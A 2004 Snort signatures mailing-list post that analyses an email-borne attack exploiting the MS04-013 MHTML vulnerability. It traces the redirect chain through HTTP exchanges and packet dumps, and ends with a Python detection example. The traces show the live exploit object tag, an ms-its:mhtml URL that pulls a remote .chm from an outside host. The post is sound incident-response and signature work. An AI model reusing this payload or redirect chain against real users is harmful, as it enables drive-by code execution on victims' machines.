[Snort-sigs] Perhaps a new worm type using MS MHTML parsing vulnerability (MS04-013: CAN-2004-0380)

Benoit Donneaux benoit.donneaux at ...2445...
Wed May 5 15:14:02 EDT 2004


We found suspicious mail activity this morning on our network.

And you?

Many mails with valid corporate RCPTs:

-------- Original Message --------
Subject: RE:
Date: Wed, 05 May 2004 16:23:01 +0200 (MEST)
From: mailserver.domain.net <validrcpt1 at ...2459...>
To: validrcpt2 at ...2459...
<A href="http://drs.yahoo.com/domain.net/NEWS/*http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/#http://drs.yahoo.com/nrb.be/NEWS">
http://drs.yahoo.com/domain.net/NEWS
</A>
--------- End Of Message ---------

REM: not the real message (copy/paste)

This URL works with every "domain.net" value!

The real exploit is downloaded at the sixth step! Coincidence or intentional?
Vulnerability reference: CAN-2004-0380

1) Web access to the Yahoo redirector with a second web server as argument: uisdfacoizuxcpojkfgskjfhskjn.cjb.net

    GET /domain.net/NEWS/*http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/ HTTP/1.1
    Host: drs.yahoo.com
    ...
    
    HTTP/1.0 302 RD
    Location: http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/

2) Web access to uisdfacoizuxcpojkfgskjfhskjn.cjb.net
    
    GET /www.YAHOO.com/ HTTP/1.1
    Host: uisdfacoizuxcpojkfgskjfhskjn.cjb.net

    HTTP/1.1 200 OK
    ...
    <frame name="frame" src="http://www.terra.es/personal6/aport24/www.YAHOO.com/">
    <meta http-equiv="refresh" content="0; url=http://www.terra.es/personal6/aport24/www.YAHOO.com/">
    <a href="http://www.terra.es/personal6/aport24/www.YAHOO.com/">http://www.terra.es/personal6/aport24/www.YAHOO.com/</a>
    ...
    
    - The host name seems to be static... today, but what's next?
    - Another redirect + frame is served at /www.YAHOO.com (xxx.terra.es)

3) Web access to www.terra.es

    GET /personal6/aport24/www.YAHOO.com/ HTTP/1.1
    Host: www.terra.es
    ...

    HTTP/1.1 200 OK
    ...
   
 parent.navigate('http://www.terra.es/personal6/aport24/www.YAHOO.com/terra.html'); 

    ...
    
    GET /personal6/aport24/www.YAHOO.com/terra.html HTTP/1.1
    Host: www.terra.es
    ...

    HTTP/1.1 200 OK
    
    - I don't know how, perhaps in JScript, but the critical web server is referenced: counter.spros.com

    
6) Web access to counter.spros.com

    GET /1/count.html HTTP/1.1
    Host: counter.spros.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
    Accept-Language: fr-be,en-us;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.terra.es/personal6/aport24/www.YAHOO.com/terra.html

    HTTP/1.1 200 OK
    Date: Wed, 05 May 2004 22:32:28 GMT
    Server: Apache/2.0.40 (Red Hat Linux)
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html

    47
    <object data='ms-its:mhtml:file://C:zbc.mht!http://counter.spros.com/2/
    7
    sys.chm
    2f
    ::/newe.htm' type='text/x-scriptlet'></object>

    0

    - I think the malicious code is downloaded here, in the object tag!
    - See here for an exploit sample: http://www.securityfocus.com/bid/9107/exploit/

MHTML exploit trace:

05/05-17:04:15.785929 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46174 IpLen:20 DgmLen:48 DF
******S* Seq: 0x4147C7A8  Ack: 0x0  Win: 0xFFFF  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.910024 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xEF559B25  Ack: 0x4147C7A9  Win: 0x16D0  TcpLen: 28
TCP Options (4) => MSS: 1380 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.910396 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46194 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x4147C7A9  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.981910 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46195 IpLen:20 DgmLen:574 DF
***AP*** Seq: 0x4147C7A9  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 20
47 45 54 20 2F 31 2F 63 6F 75 6E 74 2E 68 74 6D  GET /1/count.htm
6C 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74  l HTTP/1.1..Host
3A 20 63 6F 75 6E 74 65 72 2E 73 70 72 6F 73 2E  : counter.spros.
63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A  com..User-Agent:
20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69   Mozilla/5.0 (Wi
6E 64 6F 77 73 3B 20 55 3B 20 57 69 6E 64 6F 77  ndows; U; Window
73 20 4E 54 20 35 2E 30 3B 20 65 6E 2D 55 53 3B  s NT 5.0; en-US;
20 72 76 3A 31 2E 34 29 20 47 65 63 6B 6F 2F 32   rv:1.4) Gecko/2
30 30 33 30 36 32 34 20 4E 65 74 73 63 61 70 65  0030624 Netscape
2F 37 2E 31 20 28 61 78 29 0D 0A 41 63 63 65 70  /7.1 (ax)..Accep
74 3A 20 74 65 78 74 2F 78 6D 6C 2C 61 70 70 6C  t: text/xml,appl
69 63 61 74 69 6F 6E 2F 78 6D 6C 2C 61 70 70 6C  ication/xml,appl
69 63 61 74 69 6F 6E 2F 78 68 74 6D 6C 2B 78 6D  ication/xhtml+xm
6C 2C 74 65 78 74 2F 68 74 6D 6C 3B 71 3D 30 2E  l,text/html;q=0.
39 2C 74 65 78 74 2F 70 6C 61 69 6E 3B 71 3D 30  9,text/plain;q=0
2E 38 2C 76 69 64 65 6F 2F 78 2D 6D 6E 67 2C 69  .8,video/x-mng,i
6D 61 67 65 2F 70 6E 67 2C 69 6D 61 67 65 2F 6A  mage/png,image/j
70 65 67 2C 69 6D 61 67 65 2F 67 69 66 3B 71 3D  peg,image/gif;q=
30 2E 32 2C 2A 2F 2A 3B 71 3D 30 2E 31 0D 0A 41  0.2,*/*;q=0.1..A
63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20  ccept-Language:
66 72 2D 62 65 2C 65 6E 2D 75 73 3B 71 3D 30 2E  fr-be,en-us;q=0.
35 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  5..Accept-Encodi
6E 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65  ng: gzip,deflate
0D 0A 41 63 63 65 70 74 2D 43 68 61 72 73 65 74  ..Accept-Charset
3A 20 49 53 4F 2D 38 38 35 39 2D 31 2C 75 74 66  : ISO-8859-1,utf
2D 38 3B 71 3D 30 2E 37 2C 2A 3B 71 3D 30 2E 37  -8;q=0.7,*;q=0.7
0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 33 30  ..Keep-Alive: 30
30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B  0..Connection: k
65 65 70 2D 61 6C 69 76 65 0D 0A 52 65 66 65 72  eep-alive..Refer
65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 77 2E 74  er: http://www.t
65 72 72 61 2E 65 73 2F 70 65 72 73 6F 6E 61 6C  erra.es/personal
36 2F 61 70 6F 72 74 32 34 2F 77 77 77 2E 59 41  6/aport24/www.YA
48 4F 4F 2E 63 6F 6D 2F 74 65 72 72 61 2E 68 74  HOO.com/terra.ht
6D 6C 0D 0A 0D 0A                                ml....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.105456 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22651 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xEF559B26  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191541 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22653 IpLen:20 DgmLen:117 DF
***AP*** Seq: 0xEF559BCD  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
34 37 0D 0A 3C 6F 62 6A 65 63 74 20 64 61 74 61  47..<object data
3D 27 6D 73 2D 69 74 73 3A 6D 68 74 6D 6C 3A 66  ='ms-its:mhtml:f
69 6C 65 3A 2F 2F 43 3A 7A 62 63 2E 6D 68 74 21  ile://C:zbc.mht!
68 74 74 70 3A 2F 2F 63 6F 75 6E 74 65 72 2E 73  http://counter.s
70 72 6F 73 2E 63 6F 6D 2F 32 2F 0D 0A           pros.com/2/..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191542 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22652 IpLen:20 DgmLen:207 DF
***AP*** Seq: 0xEF559B26  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 57 65 64 2C 20 30 35 20 4D  .Date: Wed, 05 M
61 79 20 32 30 30 34 20 32 32 3A 33 32 3A 32 38  ay 2004 22:32:28
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 2F 32 2E 30 2E 34 30 20 28 52 65 64  ache/2.0.40 (Red
20 48 61 74 20 4C 69 6E 75 78 29 0D 0A 43 6F 6E   Hat Linux)..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
54 72 61 6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E  Transfer-Encodin
67 3A 20 63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74  g: chunked..Cont
65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68  ent-Type: text/h
74 6D 6C 0D 0A 0D 0A                             tml....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191543 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22654 IpLen:20 DgmLen:110 DF
***AP**F Seq: 0xEF559C1A  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
37 0D 0A 73 79 73 2E 63 68 6D 0D 0A 32 66 0D 0A  7..sys.chm..2f..
3A 3A 2F 6E 65 77 65 2E 68 74 6D 27 20 74 79 70  ::/newe.htm' typ
65 3D 27 74 65 78 74 2F 78 2D 73 63 72 69 70 74  e='text/x-script
6C 65 74 27 3E 3C 2F 6F 62 6A 65 63 74 3E 0A 0D  let'></object>..
0A 30 0D 0A 0D 0A                                .0....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192119 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46196 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x4147C9BF  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 32
TCP Options (3) => NOP NOP Sack: 61269 at ...2460...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192120 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46197 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x4147C9BF  Ack: 0xEF559C61  Win: 0xFEC5  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192858 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46200 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x4147C9BF  Ack: 0xEF559C61  Win: 0xFEC5  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.315621 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22655 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xEF559C61  Ack: 0x4147C9C0  Win: 0x1920  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Cisco IDS S91 matches the Illegal MHTML URL syntax.

I don't know about the current Snort ruleset...
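As an added illustration (not part of the original post), the chunked response in step 6 splits the ms-its:mhtml: URL across two TCP segments, so a signature that wants the whole chained URL in a single packet never sees it; the Python below reassembles and dechunks the body before matching, using the payload bytes from the trace above as constructed input.

```python
import re

# Payloads of the two data packets from counter.spros.com in the trace above,
# constructed from its hex dump (the header packet is omitted). The chunk
# boundaries split the remote .chm URL across the two segments.
PACKET_PAYLOADS = [
    b"47\r\n<object data='ms-its:mhtml:file://C:zbc.mht!http://counter.spros.com/2/\r\n",
    b"7\r\nsys.chm\r\n2f\r\n::/newe.htm' type='text/x-scriptlet'></object>\n\r\n0\r\n\r\n",
]
CHUNKED_BODY = b"".join(PACKET_PAYLOADS)  # the TCP stream, reassembled in order

# Chained ms-its:mhtml:file://...!<remote url>::/ pattern of CAN-2004-0380:
# the URL after '!' is the remote .chm that the ITS handler fetches.
MHTML_CHM_RE = re.compile(
    rb"ms-its:mhtml:file://[^'\"!\s]+!(https?://[^'\"\s]+?)::/", re.IGNORECASE
)


def dechunk(body):
    """Decode an HTTP/1.1 chunked transfer-coding body into the original bytes."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:  # last-chunk: stop (trailers are not needed here)
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def find_remote_chm(html):
    """Return the remote URLs named in ms-its:mhtml: chained URLs found in html."""
    return [m.group(1).decode("latin-1") for m in MHTML_CHM_RE.finditer(html)]


def detect(chunked_body):
    """Dechunk the reassembled response body, then look for the chained URL."""
    return find_remote_chm(dechunk(chunked_body))


if __name__ == "__main__":
    # Per-packet inspection sees only half of the URL in each segment.
    for i, payload in enumerate(PACKET_PAYLOADS, 1):
        print("packet", i, "hits:", find_remote_chm(payload))  # [] both times
    # Stream reassembly plus dechunking recovers the real target.
    print("stream hits:", detect(CHUNKED_BODY))  # ['http://counter.spros.com/2/sys.chm']
```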
